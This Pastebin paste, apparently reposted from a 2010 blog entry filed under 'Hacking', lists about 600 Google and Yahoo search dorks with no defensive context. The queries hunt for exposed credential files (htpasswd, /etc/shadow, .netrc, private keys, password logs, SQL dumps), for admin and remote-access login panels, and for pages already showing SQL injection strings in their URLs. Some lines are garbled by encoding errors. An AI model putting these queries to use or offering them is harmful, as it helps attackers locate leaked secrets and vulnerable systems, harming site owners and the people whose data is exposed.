amm88

My collection Of GOOGLE DORKS

Nov 28th, 2018
254
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 312.84 KB | None | 0 0
  1. My Collection DORK
  2. Filed under: Hacking — 21 Comments April 20, 2010
  3. http://fr.search.yahoo.com/search?p=inurl%3A%2Bunion%2Bselect%2B++++admin&ei=UTF-8&y=Rechercher&fr=moz2&xargs=0&pstart=1&b=251
  4.  
  5. http://fr.search.yahoo.com/search;_ylt=A1f4cfWQFkxJ9swAnMdjAQx.?p=inurl%3A%2Bunion%2Bselect%2B+++SHOP&y=Rechercher&fr=moz2&ei=UTF-8&rd=r1
  6.  
  7. http://fr.search.yahoo.com/search;_ylt=A1f4cfQSF0xJ7HIB4DdjAQx.?p=inurl%3A%2Bunion%2Bselect%2B+++pass&y=Rechercher&fr=moz2&ei=UTF-8
  8.  
  9. http://fr.search.yahoo.com/search;_ylt=A1f4cflOF0xJgGIAFGZjAQx.?p=inurl%3A%2Bunion%2Bselect%2B+++from&y=Rechercher&fr=moz2&ei=UTF-8&rd=r1
  10.  
  11. http://www.google.co.ma/search?hl=fr&client=firefox-a&rls=org.mozilla%3Afr%3Aofficial&hs=AA8&q=inurl%3A(user%2C0x3a%2Cpass)&btnG=Rechercher&meta=
  12.  
  13. http://www.google.co.ma/search?hl=fr&q=inurl%3A(%40version%2C0x3a%2Cdatabse)&meta=&btnG=Recherche+Google
  14.  
  15. http://www.google.co.ma/search?q=inurl%3A(0x3a%2Cversion&btnG=Rechercher&hl=fr&sa=2
  16.  
  17. http://www.google.co.ma/search?q=inurl%3Aconcat(database()%2C0x3a&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:fr:official&client=firefox-a
  18.  
  19. ————————————————————————————–
  20. http://fr.search.yahoo.com/search?p=inurl%3A(0x3a%2Cversion&ei=UTF-8&fr=moz2
  21.  
  22. http://fr.search.yahoo.com/search?p=inurl%3Aconcat(database()%2C0x3a&ei=UTF-8&fr=moz2
  23.  
  24. http://www.google.co.ma/search?q=inurl%3Aconcat(0x3a&btnG=Rechercher&hl=fr&client=firefox-a&rls=org.mozilla%3Afr%3Aofficial&hs=ntS&sa=2
  25.  
  26. ————————————————————————————————————————————————–
  27.  
  28. allinurl: \”index php go buy\”
  29. allinurl: \”index.php?go=sell\”
  30. allinurl: \”index php go linkdir\”
  31. allinurl: \”index.php?go=resource_center\”
  32. allinurl: \”resource_center.html\”
  33. allinurl: \”index.php?go=properties\”
  34. allinurl: \”index.php?go=register\”
  35. “admin account info” filetype:log
  36. !Host=*.* intext:enc_UserPassword=* ext:pcf
  37. “# -FrontPage-” ext:pwd inurl:(service | authors | administrators | users) “# -FrontPage-” inurl:service.pwd
  38. “AutoCreate=TRUE password=*”
  39. “http://*:*@www” domainname
  40. “index of/” “ws_ftp.ini” “parent directory”
  41. “liveice configuration file” ext:cfg -site:sourceforge.net
  42. “parent directory” +proftpdpasswd
  43. “Duclassified” -site:duware.com “DUware All Rights reserved”
  44. “duclassmate” -site:duware.com
  45. “Dudirectory” -site:duware.com
  46. “dudownload” -site:duware.com
  47. “Elite Forum Version *.*”
  48. “Link Department”
  49. “Created by Ladger”
  50. “sets mode: +k”
  51. “your password is” filetype:log
  52. “DUpaypal” -site:duware.com
  53. allinurl: admin mdb
  54. auth_user_file.txt
  55. config.php
  56. eggdrop filetype:user user
  57. enable password | secret “current configuration” -intext:the
  58. etc (index.of)
  59. ext:asa | ext:bak intext:uid intext:pwd -“uid..pwd” database | server | dsn
  60. ext:inc “pwd=” “UID=”
  61. ext:ini eudora.ini
  62. ext:ini Version=4.0.0.4 password
  63. ext:passwd -intext:the -sample -example
  64. ext:txt inurl:unattend.txt
  65. ext:yml database inurl:config
  66. filetype:bak createobject sa
  67. filetype:bak inurl:”htaccess|passwd|shadow|htusers”
  68. filetype:cfg mrtg “target
  69. filetype:cfm “cfapplication name” password
  70. filetype:conf oekakibbs
  71. filetype:config config intext:appSettings “User ID”
  72. filetype:dat “password.dat”
  73. filetype:dat inurl:Sites.dat
  74. filetype:dat wand.dat
  75. filetype:inc mysql_connect OR mysql_pconnect
  76. filetype:inf sysprep
  77. filetype:ini inurl:”serv-u.ini”
  78. filetype:ini ServUDaemon
  79. filetype:ldb admin
  80. filetype:log “See `ipsec –copyright”
  81. filetype:log inurl:”password.log”
  82. filetype:mdb inurl:users.mdb
  83. filetype:netrc password
  84. filetype:pem intext:private
  85. filetype:properties inurl:db intext:password
  86. filetype:pwl pwl
  87. filetype:reg reg +intext:”defaultusername” +intext:”defaultpassword”
  88. filetype:reg reg +intext:�WINVNC3�
  89. filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
  90. filetype:sql “insert into” (pass|passwd|password)
  91. filetype:sql (“values * MD5” | “values * password” | “values * encrypt”)
  92. filetype:sql +”IDENTIFIED BY” -cvs
  93. filetype:sql password
  94. filetype:url +inurl:”ftp://” +inurl:”;@”
  95. filetype:xls username password email
  96. htpasswd
  97. htpasswd / htgroup
  98. htpasswd / htpasswd.bak
  99. intext:”enable password 7″
  100. intext:”enable secret 5 $”
  101. EZGuestbook”
  102. filetype:cfm “cfapplication name” password
  103. filetype:pass pass intext:userid
  104. allinurl:auth_user_file.txt
  105. eggdrop filetype:user
  106. filetype:ini inurl:flashFXP.ini
  107. filetype:url +inurl:”ftp://” +inurl:”@” FTPtest -tutorial ??
  108. filetype:htpasswd
  109. intitle:”Index of” “.htpasswd” “htgroup” -intitle:”dist” -apache -htpasswd.c
  110. intitle:”Index of” “.htpasswd”
  111. “http://*:*@www” bob:bob
  112. “sets mode: +k” IRC channel keys
  113. “Your password is * Remember this for later use”
  114. signin filetype:url
  115. LeapFTP intitle:”index.of./” sites.ini
  116. inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd ??man
  117. filetype:config config intext:appSettings “User ID”
  118. filetype:pwd service
  119. “# -FrontPage-” inurl:service.pwd
  120. ext:pwd inurl:_vti_pvt inurl:(Service | authors | administrators)
  121. intitle:”index of” intext:connect.inc
  122. intitle:”index of” intext:globals.inc
  123. filetype:conf oekakibbs Oekakibss user passwords
  124. filetype:dat wand.dat Opera, ?úMagic Wand, ?ù
  125. inurl:ospfd.conf intext:password -sample -test -tutorial ??
  126. index.of passlist
  127. inurl:passlist.txt
  128. filetype:dat “password.dat”
  129. inurl:password.log filetype:log
  130. filetype:log inurl:”password.log”
  131. inurl:people.lst filetype:lst
  132. intitle:index.of config.php
  133. inurl:config.php dbuname
  134. filetype:conf inurl:psybnc.conf “USER.PASS=”
  135. filetype:conf slapd.conf
  136. inurl:”slapd.conf” intext:”credentials” -manpage -”Manual Page” -man: -sample
  137. inurl:”slapd.conf” intext:”rootpw” -manpage -”Manual Page” -man: -sample
  138. filetype:sql “IDENTIFIED BY” ??cvs
  139. filetype:ini wcx_ftp
  140. filetype:netrc password UNIX .netrc
  141. index.of.etc UNIX /etc
  142. intitle:”Index of..etc” passwd UNIX /etc/passwd
  143. intitle:index.of passwd passwd.bak UNIX /etc/passwd
  144. intitle:”Index of” pwd.db UNIX /etc/pwd.db
  145. intitle:Index.of etc shadow UNIX /etc/shadow
  146. intitle:index.of master.passwd UNIX master.passwd
  147. intitle:”Index of” spwd.db passwd -pam.conf UNIX spwd.db
  148. filetype:bak inurl:”htaccess|passwd|shadow|htusers
  149. filetype:inc dbconn
  150. inurl:vtund.conf intext:pass ??cvs
  151. inurl:”wvdial.conf” intext:”password”
  152. filetype:mdb wwforum Web Wiz Forums Web credentials
  153. “AutoCreate=TRUE password=*” Website Access Analyzer
  154. filetype:pwl pwl Windows Password List user credentials
  155. filetype:reg reg +intext:”defaultusername” intext:”defaultpassword”
  156. filetype:reg reg +intext:”internet account manager”
  157. “index of/” “ws_ftp.ini” “parent directory”
  158. filetype:ini ws_ftp pwd WS_FTP
  159. inurl:/wwwboard wwwboard
  160. inurl:zebra.conf intext:password -sample –
  161. intext:”
  162. Web Wiz Journal”
  163. intitle:”index of” intext:connect.inc
  164. intitle:”index of” intext:globals.inc
  165. intitle:”Index of” passwords modified
  166. intitle:”Index of” sc_serv.conf sc_serv content
  167. intitle:”phpinfo()” +”mysql.default_password” +”Zend Scripting Language Engine”
  168. intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
  169. intitle:index.of administrators.pwd
  170. intitle:Index.of etc shadow
  171. intitle:index.of intext:”secring.skr”|”secring.pgp”|”secring.bak”
  172. intitle:rapidshare intext:login
  173. inurl:”calendarscript/users.txt”
  174. inurl:”editor/list.asp” | inurl:”database_editor.asp” | inurl:”login.asa” “are set”
  175. inurl:”GRC.DAT” intext:”password”
  176. inurl:”Sites.dat”+”PASS=”
  177. inurl:”slapd.conf” intext:”credentials” -manpage -“Manual Page” -man: -sample
  178. inurl:”slapd.conf” intext:”rootpw” -manpage -“Manual Page” -man: -sample
  179. inurl:/db/main.mdb
  180. inurl:/yabb/Members/Admin.dat
  181. inurl:ccbill filetype:log
  182. inurl:cgi-bin inurl:calendar.cfg
  183. inurl:chap-secrets -cvs
  184. inurl:config.php dbuname dbpass
  185. inurl:filezilla.xml -cvs
  186. inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
  187. inurl:nuke filetype:sql
  188. inurl:ospfd.conf intext:password -sample -test -tutorial -download
  189. inurl:pap-secrets -cvs
  190. inurl:pass.dat
  191. inurl:perform filetype:ini
  192. inurl:perform.ini filetype:ini
  193. inurl:secring ext:skr | ext:pgp | ext:bak
  194. inurl:server.cfg rcon password
  195. inurl:ventrilo_srv.ini adminpassword
  196. inurl:vtund.conf intext:pass -cvs
  197. inurl:zebra.conf intext:password -sample -test -tutorial -download
  198. LeapFTP intitle:”index.of./” sites.ini modified
  199. master.passwd
  200. mysql history files
  201. NickServ registration passwords
  202. passlist
  203. passlist.txt (a better way)
  204. passwd
  205. passwd / etc (reliable)
  206. people.lst
  207. psyBNC config files
  208. pwd.db
  209. server-dbs “intitle:index of”
  210. spwd.db / passwd
  211. trillian.ini
  212. wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
  213. [WFClient] Password= filetype:ica
  214. intitle:”remote assessment” OpenAanval Console
  215. intitle:opengroupware.org “resistance is obsolete” “Report Bugs” “Username” “password”
  216. “bp blog admin” intitle:login | intitle:admin -site:johnny.ihackstuff.com
  217. “Emergisoft web applications are a part of our”
  218. “Establishing a secure Integrated Lights Out session with” OR intitle:”Data Frame – Browser not HTTP 1.1 compatible” OR intitle:”HP Integrated Lights-
  219. “HostingAccelerator” intitle:”login” +”Username” -“news” -demo
  220. “iCONECT 4.1 :: Login”
  221. “IMail Server Web Messaging” intitle:login
  222. “inspanel” intitle:”login” -“cannot” “Login ID” -site:inspediumsoft.com
  223. “intitle:3300 Integrated Communications Platform” inurl:main.htm
  224. “Login – Sun Cobalt RaQ”
  225. “login prompt” inurl:GM.cgi
  226. “Login to Usermin” inurl:20000
  227. “Microsoft CRM : Unsupported Browser Version”
  228. “OPENSRS Domain Management” inurl:manage.cgi
  229. “pcANYWHERE EXPRESS Java Client”
  230. “Please authenticate yourself to get access to the management interface”
  231. “please log in”
  232. “Please login with admin pass” -“leak” -sourceforge
  233. “CuteNews” “2003..2005 CutePHP”
  234. “DWMail” password intitle:dwmail
  235. “Merak Mail Server Software” -.gov -.mil -.edu -site:merakmailserver.com
  236. “Midmart Messageboard” “Administrator Login”
  237. “Monster Top List” MTL numrange:200-
  238. “UebiMiau” -site:sourceforge.net
  239. “site info for” “Enter Admin Password”
  240. “SquirrelMail version” “By the SquirrelMail Development Team”
  241. “SysCP – login”
  242. “This is a restricted Access Server” “Javascript Not Enabled!”|”Messenger Express” -edu -ac
  243. “This section is for Administrators only. If you are an administrator then please”
  244. “ttawlogin.cgi/?action=”
  245. “VHCS Pro ver” -demo
  246. “VNC Desktop” inurl:5800
  247. “Web-Based Management” “Please input password to login” -inurl:johnny.ihackstuff.com
  248. “WebExplorer Server – Login” “Welcome to WebExplorer Server”
  249. “WebSTAR Mail – Please Log In”
  250. “You have requested access to a restricted area of our website. Please authenticate yourself to continue.”
  251. “You have requested to access the management functions” -.edu
  252. (intitle:”Please login – Forums UBB.threads”)|(inurl:login.php “ubb”)
  253. (intitle:”Please login – Forums WWWThreads”)|(inurl:”wwwthreads/login.php”)|(inurl:”wwwthreads/login.pl?Cat=”)
  254. (intitle:”rymo Login”)|(intext:”Welcome to rymo”) -family
  255. (intitle:”WmSC e-Cart Administration”)|(intitle:”WebMyStyle e-Cart Administration”)
  256. (inurl:”ars/cgi-bin/arweb?O=0″ | inurl:arweb.jsp) -site:remedy.com -site:mil
  257. 4images Administration Control Panel
  258. allintitle:”Welcome to the Cyclades”
  259. allinurl:”exchange/logon.asp”
  260. allinurl:wps/portal/ login ASP.login_aspx “ASP.NET_SessionId”
  261. CGI:IRC Login
  262. ext:cgi intitle:”control panel” “enter your owner password to continue!”
  263. ez Publish administration
  264. filetype:php inurl:”webeditor.php”
  265. filetype:pl “Download: SuSE Linux Openexchange Server CA”
  266. filetype:r2w r2w
  267. intext:””BiTBOARD v2.0″ BiTSHiFTERS Bulletin Board”
  268. intext:”Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed.” -edu
  269. intext:”Mail admins login here to administrate your domain.”
  270. intext:”Master Account” “Domain Name” “Password” inurl:/cgi-bin/qmailadmin
  271. intext:”Storage Management Server for” intitle:”Server Administration”
  272. intext:”Welcome to” inurl:”cp” intitle:”H-SPHERE” inurl:”begin.html” -Fee
  273. intext:”vbulletin” inurl:admincp
  274. intitle:”*- HP WBEM Login” | “You are being prompted to provide login account information for *” | “Please provide the information requested and press
  275. intitle:”Admin Login” “admin login” “blogware”
  276. intitle:”Admin login” “Web Site Administration” “Copyright”
  277. intitle:”AlternC Desktop”
  278. intitle:”Athens Authentication Point”
  279. intitle:”b2evo > Login form” “Login form. You must log in! You will have to accept cookies in order to log in” -demo -site:b2evolution.net
  280. intitle:”Cisco CallManager User Options Log On” “Please enter your User ID and Password in the spaces provided below and click the Log On button to co
  281. intitle:”ColdFusion Administrator Login”
  282. intitle:”communigate pro * *” intitle:”entrance”
  283. intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo
  284. intitle:”Dell Remote Access Controller”
  285. intitle:”Docutek ERes – Admin Login” -edu
  286. intitle:”Employee Intranet Login”
  287. intitle:”eMule *” intitle:”- Web Control Panel” intext:”Web Control Panel” “Enter your password here.”
  288. intitle:”ePowerSwitch Login”
  289. intitle:”eXist Database Administration” -demo
  290. intitle:”EXTRANET * – Identification”
  291. intitle:”EXTRANET login” -.edu -.mil -.gov
  292. intitle:”EZPartner” -netpond
  293. intitle:”Flash Operator Panel” -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
  294. intitle:”i-secure v1.1″ -edu
  295. intitle:”Icecast Administration Admin Page”
  296. intitle:”iDevAffiliate – admin” -demo
  297. intitle:”ISPMan : Unauthorized Access prohibited”
  298. intitle:”ITS System Information” “Please log on to the SAP System”
  299. intitle:”Kurant Corporation StoreSense” filetype:bok
  300. intitle:”ListMail Login” admin -demo
  301. intitle:”Login – Easy File Sharing Web Server”
  302. intitle:”Login Forum AnyBoard” intitle:”If you are a new user:” intext:”ForumAnyBoard” inurl:gochat -edu
  303. intitle:”Login to @Mail” (ext:pl | inurl:”index”) -dwaffleman
  304. intitle:”Login to Cacti”
  305. intitle:”Login to the forums – @www.aimoo.com” inurl:login.cfm?id=
  306. intitle:”MailMan Login”
  307. intitle:”Member Login” “NOTE: Your browser must have cookies enabled in order to log into the site.” ext:php OR ext:cgi
  308. intitle:”Merak Mail Server Web Administration” -ihackstuff.com
  309. intitle:”microsoft certificate services” inurl:certsrv
  310. intitle:”MikroTik RouterOS Managing Webpage”
  311. intitle:”MX Control Console” “If you can’t remember”
  312. intitle:”Novell Web Services” “GroupWise” -inurl:”doc/11924″ -.mil -.edu -.gov -filetype:pdf
  313. intitle:”Novell Web Services” intext:”Select a service and a language.”
  314. intitle:”oMail-admin Administration – Login” -inurl:omnis.ch
  315. intitle:”OnLine Recruitment Program – Login”
  316. intitle:”Philex 0.2*” -script -site:freelists.org
  317. intitle:”PHP Advanced Transfer” inurl:”login.php”
  318. intitle:”php icalendar administration” -site:sourceforge.net
  319. intitle:”phpPgAdmin – Login” Language
  320. intitle:”PHProjekt – login” login password
  321. intitle:”please login” “your password is *”
  322. intitle:”Remote Desktop Web Connection” inurl:tsweb
  323. intitle:”SFXAdmin – sfx_global” | intitle:”SFXAdmin – sfx_local” | intitle:”SFXAdmin – sfx_test”
  324. intitle:”SHOUTcast Administrator” inurl:admin.cgi
  325. intitle:”site administration: please log in” “site designed by emarketsouth”
  326. intitle:”Supero Doctor III” -inurl:supermicro
  327. intitle:”SuSE Linux Openexchange Server” “Please activate JavaScript!”
  328. intitle:”teamspeak server-administration
  329. intitle:”Tomcat Server Administration”
  330. intitle:”TOPdesk ApplicationServer”
  331. intitle:”TUTOS Login”
  332. intitle:”TWIG Login”
  333. intitle:”vhost” intext:”vHost . 2000-2004″
  334. intitle:”Virtual Server Administration System”
  335. intitle:”VisNetic WebMail” inurl:”/mail/”
  336. intitle:”VitalQIP IP Management System”
  337. intitle:”VMware Management Interface:” inurl:”vmware/en/”
  338. intitle:”VNC viewer for Java”
  339. intitle:”web-cyradm”|”by Luc de Louw” “This is only for authorized users” -tar.gz -site:web-cyradm.org
  340. intitle:”WebLogic Server” intitle:”Console Login” inurl:console
  341. intitle:”Welcome Site/User Administrator” “Please select the language” -demos
  342. intitle:”Welcome to Mailtraq WebMail”
  343. intitle:”welcome to netware *” -site:novell.com
  344. intitle:”WorldClient” intext:”? (2003|2004) Alt-N Technologies.”
  345. intitle:”xams 0.0.0..15 – Login”
  346. intitle:”XcAuctionLite” | “DRIVEN BY XCENT” Lite inurl:admin
  347. intitle:”XMail Web Administration Interface” intext:Login intext:password
  348. intitle:”Zope Help System” inurl:HelpSys
  349. intitle:”ZyXEL Prestige Router” “Enter password”
  350. intitle:”inc. vpn 3000 concentrator”
  351. intitle:(“TrackerCam Live Video”)|(“TrackerCam Application Login”)|(“Trackercam Remote”) -trackercam.com
  352. intitle:asterisk.management.portal web-access
  353. intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
  354. intitle:Group-Office “Enter your username and password to login”
  355. intitle:ilohamail “IlohaMail”
  356. intitle:ilohamail intext:”Version 0.8.10″ “IlohaMail”
  357. intitle:IMP inurl:imp/index.php3
  358. intitle:Login * Webmailer
  359. intitle:Login intext:”RT is ? Copyright”
  360. intitle:Node.List Win32.Version.3.11
  361. intitle:Novell intitle:WebAccess “Copyright *-* Novell, Inc”
  362. intitle:open-xchange inurl:login.pl
  363. intitle:Ovislink inurl:private/login
  364. intitle:phpnews.login
  365. intitle:plesk inurl:login.php3
  366. inurl:”/admin/configuration. php?” Mystore
  367. inurl:”/slxweb.dll/external?name=(custportal|webticketcust)”
  368. inurl:”1220/parse_xml.cgi?”
  369. inurl:”631/admin” (inurl:”op=*”) | (intitle:CUPS)
  370. inurl:”:10000″ intext:webmin
  371. inurl:”Activex/default.htm” “Demo”
  372. inurl:”calendar.asp?action=login”
  373. inurl:”default/login.php” intitle:”kerio”
  374. inurl:”gs/adminlogin.aspx”
  375. inurl:”php121login.php”
  376. inurl:”suse/login.pl”
  377. inurl:”typo3/index.php?u=” -demo
  378. inurl:”usysinfo?login=true”
  379. inurl:”utilities/TreeView.asp”
  380. inurl:”vsadmin/login” | inurl:”vsadmin/admin” inurl:.php|.asp
  381. nurl:/admin/login.asp
  382. inurl:/cgi-bin/sqwebmail?noframes=1
  383. inurl:/Citrix/Nfuse17/
  384. inurl:/dana-na/auth/welcome.html
  385. inurl:/eprise/
  386. inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:”Miva Merchant Administration Login” -inurl:cheap-malboro.net
  387. inurl:/modcp/ intext:Moderator+vBulletin
  388. inurl:/SUSAdmin intitle:”Microsoft Software Update Services”
  389. inurl:/webedit.* intext:WebEdit Professional -html
  390. inurl:1810 “Oracle Enterprise Manager”
  391. inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
  392. inurl::2082/frontend -demo
  393. inurl:administrator “welcome to mambo”
  394. inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
  395. inurl:cgi-bin/ultimatebb.cgi?ubb=login
  396. inurl:Citrix/MetaFrame/default/default.aspx
  397. inurl:confixx inurl:login|anmeldung
  398. inurl:coranto.cgi intitle:Login (Authorized Users Only)
  399. inurl:csCreatePro.cgi
  400. inurl:default.asp intitle:”WebCommander”
  401. inurl:exchweb/bin/auth/owalogon.asp
  402. inurl:gnatsweb.pl
  403. inurl:ids5web
  404. inurl:irc filetype:cgi cgi:irc
  405. inurl:login filetype:swf swf
  406. inurl:login.asp
  407. inurl:login.cfm
  408. inurl:login.php “SquirrelMail version”
  409. inurl:metaframexp/default/login.asp | intitle:”Metaframe XP Login”
  410. inurl:mewebmail
  411. inurl:names.nsf?opendatabase
  412. inurl:ocw_login_username
  413. inurl:orasso.wwsso_app_admin.ls_login
  414. inurl:postfixadmin intitle:”postfix admin” ext:php
  415. inurl:search/admin.php
  416. inurl:textpattern/index.php
  417. inurl:WCP_USER
  418. inurl:webmail./index.pl “Interface”
  419. inurl:webvpn.html “login” “Please enter your”
  420. Login (”
  421. Jetbox One CMS â?¢” | ”
  422. Jetstream ? *”)
  423. Novell NetWare intext:”netware management portal version”
  424. Outlook Web Access (a better way)
  425. PhotoPost PHP Upload
  426. PHPhotoalbum Statistics
  427. PHPhotoalbum Upload
  428. phpWebMail
  429. Please enter a valid password! inurl:polladmin
  430. INDEXU
  431. Ultima Online loginservers
  432. W-Nailer Upload Area
  433. intitle:”DocuShare” inurl:”docushare/dsweb/” -faq -gov -edu
  434. “#mysql dump” filetype:sql
  435. “#mysql dump” filetype:sql 21232f297a57a5a743894a0e4a801fc3
  436. “allow_call_time_pass_reference” “PATH_INFO”
  437. “Certificate Practice Statement” inurl:(PDF | DOC)
  438. “Generated by phpSystem”
  439. “generated by wwwstat”
  440. “Host Vulnerability Summary Report”
  441. “HTTP_FROM=googlebot” googlebot.com “Server_Software=”
  442. “Index of” / “chat/logs”
  443. “Installed Objects Scanner” inurl:default.asp
  444. “MacHTTP” filetype:log inurl:machttp.log
  445. “Mecury Version” “Infastructure Group”
  446. “Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)” ext:log
  447. “Most Submitted Forms and Scripts” “this section”
  448. “Network Vulnerability Assessment Report”
  449. “not for distribution” confidential
  450. “not for public release” -.edu -.gov -.mil
  451. “phone * * *” “address *” “e-mail” intitle:”curriculum vitae”
  452. “phpMyAdmin” “running on” inurl:”main.php”
  453. “produced by getstats”
  454. “Request Details” “Control Tree” “Server Variables”
  455. “robots.txt” “Disallow:” filetype:txt
  456. “Running in Child mode”
  457. “sets mode: +p”
  458. “sets mode: +s”
  459. “Thank you for your order” +receipt
  460. “This is a Shareaza Node”
  461. “This report was generated by WebLog”
  462. ( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
  463. (intitle:”PRTG Traffic Grapher” inurl:”allsensors”)|(intitle:”PRTG Traffic Grapher – Monitoring Results”)
  464. (intitle:WebStatistica inurl:main.php) | (intitle:”WebSTATISTICA server”) -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob
  465. (inurl:”robot.txt” | inurl:”robots.txt” ) intext:disallow filetype:txt
  466. +”:8080″ +”:3128″ +”:80″ filetype:txt
  467. +”HSTSNR” -“netop.com”
  468. -site:php.net -“The PHP Group” inurl:source inurl:url ext:pHp
  469. 94FBR “ADOBE PHOTOSHOP”
  470. AIM buddy lists
  471. allinurl:/examples/jsp/snp/snoop.jsp
  472. allinurl:cdkey.txt
  473. allinurl:servlet/SnoopServlet
  474. cgiirc.conf
  475. contacts ext:wml
  476. data filetype:mdb -site:gov -site:mil
  477. exported email addresses
  478. ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:”budget approved”) inurl:confidential
  479. ext:asp inurl:pathto.asp
  480. ext:ccm ccm -catacomb
  481. ext:CDX CDX
  482. ext:cgi inurl:editcgi.cgi inurl:file=
  483. ext:conf inurl:rsyncd.conf -cvs -man
  484. ext:conf NoCatAuth -cvs
  485. ext:dat bpk.dat
  486. ext:gho gho
  487. ext:ics ics
  488. ext:ini intext:env.ini
  489. ext:jbf jbf
  490. ext:ldif ldif
  491. ext:log “Software: Microsoft Internet Information Services *.*”
  492. ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
  493. ext:nsf nsf -gov -mil
  494. ext:plist filetype:plist inurl:bookmarks.plist
  495. ext:pqi pqi -database
  496. ext:reg “username=*” putty
  497. ext:txt “Final encryption key”
  498. ext:txt inurl:dxdiag
  499. ext:vmdk vmdk
  500. ext:vmx vmx
  501. filetype:asp DBQ=” * Server.MapPath(“*.mdb”)
  502. filetype:bkf bkf
  503. filetype:blt “buddylist”
  504. filetype:blt blt +intext:screenname
  505. filetype:cfg auto_inst.cfg
  506. filetype:cnf inurl:_vti_pvt access.cnf
  507. filetype:conf inurl:firewall -intitle:cvs
  508. filetype:config web.config -CVS
  509. filetype:ctt Contact
  510. filetype:ctt ctt messenger
  511. filetype:eml eml +intext:”Subject” +intext:”From” +intext:”To”
  512. filetype:fp3 fp3
  513. filetype:fp5 fp5 -site:gov -site:mil -“cvs log”
  514. filetype:fp7 fp7
  515. filetype:inf inurl:capolicy.inf
  516. filetype:lic lic intext:key
  517. filetype:log access.log -CVS
  518. filetype:log cron.log
  519. filetype:mbx mbx intext:Subject
  520. filetype:myd myd -CVS
  521. filetype:ns1 ns1
  522. filetype:ora ora
  523. filetype:ora tnsnames
  524. filetype:pdb pdb backup (Pilot | Pluckerdb)
  525. filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
  526. filetype:pot inurl:john.pot
  527. filetype:PS ps
  528. filetype:pst inurl:”outlook.pst”
  529. filetype:pst pst -from -to -date
  530. filetype:qbb qbb
  531. filetype:QBW qbw
  532. filetype:rdp rdp
  533. filetype:reg “Terminal Server Client”
  534. filetype:vcs vcs
  535. filetype:wab wab
  536. filetype:xls -site:gov inurl:contact
  537. filetype:xls inurl:”email.xls”
  538. Financial spreadsheets: finance.xls
  539. Financial spreadsheets: finances.xls
  540. Ganglia Cluster Reports
  541. haccess.ctl (one way)
  542. haccess.ctl (VERY reliable)
  543. ICQ chat logs, please…
  544. intext:”Session Start * * * *:*:* *” filetype:log
  545. intext:”Tobias Oetiker” “traffic analysis”
  546. intext:(password | passcode) intext:(username | userid | user) filetype:csv
  547. intext:gmail invite intext:http://gmail.google.com/gmail/a
  548. intext:SQLiteManager inurl:main.php
  549. intext:ViewCVS inurl:Settings.php
  550. intitle:”admin panel” +”RedKernel”
  551. intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
  552. intitle:”AppServ Open Project” -site:www.appservnetwork.com
  553. intitle:”ASP Stats Generator *.*” “ASP Stats Generator” “2003-2004 weppos”
  554. intitle:”Big Sister” +”OK Attention Trouble”
  555. intitle:”curriculum vitae” filetype:doc
  556. intitle:”edna:streaming mp3 server” -forums
  557. intitle:”FTP root at”
  558. intitle:”index of” +myd size
  559. intitle:”Index Of” -inurl:maillog maillog size
  560. intitle:”Index Of” cookies.txt size
  561. intitle:”index of” mysql.conf OR mysql_config
  562. intitle:”Index of” upload size parent directory
  563. intitle:”index.of *” admin news.asp configview.asp
  564. intitle:”index.of” .diz .nfo last modified
  565. intitle:”Joomla – Web Installer”
  566. intitle:”LOGREP – Log file reporting system” -site:itefix.no
  567. intitle:”Multimon UPS status page”
  568. intitle:”PHP Advanced Transfer” (inurl:index.php | inurl:showrecent.php )
  569. intitle:”PhpMyExplorer” inurl:”index.php” -cvs
  570. intitle:”statistics of” “advanced web statistics”
  571. intitle:”System Statistics” +”System and Network Information Center”
  572. intitle:”urchin (5|3|admin)” ext:cgi
  573. intitle:”Usage Statistics for” “Generated by Webalizer”
  574. intitle:”wbem” compaq login “Compaq Information Technologies Group”
  575. intitle:”Web Server Statistics for ****”
  576. intitle:”web server status” SSH Telnet
  577. intitle:”Welcome to F-Secure Policy Manager Server Welcome Page”
  578. intitle:”welcome.to.squeezebox”
  579. intitle:Bookmarks inurl:bookmarks.html “Bookmarks
  580. intitle:index.of “Apache” “server at”
  581. intitle:index.of cleanup.log
  582. intitle:index.of dead.letter
  583. intitle:index.of inbox
  584. intitle:index.of inbox dbx
  585. intitle:index.of ws_ftp.ini
  586. intitle:intranet inurl:intranet +intext:”phone”
  587. inurl:”/axs/ax-admin.pl” -script
  588. inurl:”/cricket/grapher.cgi”
  589. inurl:”bookmark.htm”
  590. inurl:”cacti” +inurl:”graph_view.php” +”Settings Tree View” -cvs -RPM
  591. inurl:”newsletter/admin/”
  592. inurl:”newsletter/admin/” intitle:”newsletter admin”
  593. inurl:”putty.reg”
  594. inurl:”smb.conf” intext:”workgroup” filetype:conf conf
  595. inurl:*db filetype:mdb
  596. inurl:/cgi-bin/pass.txt
  597. inurl:admin/add.php
  598. inurl:admin/insert.php
  599. inurl:admin/edit.php
  600. inurl:/_layouts/settings
  601. inurl:admin filetype:xls
  602. inurl:admin intitle:login
  603. inurl:backup filetype:mdb
  604. inurl:build.err
  605. inurl:cgi-bin/printenv
  606. inurl:cgi-bin/testcgi.exe “Please distribute TestCGI”
  607. inurl:changepassword.asp
  608. inurl:ds.py
  609. inurl:email filetype:mdb
  610. inurl:fcgi-bin/echo
  611. inurl:forum filetype:mdb
  612. inurl:forward filetype:forward -cvs
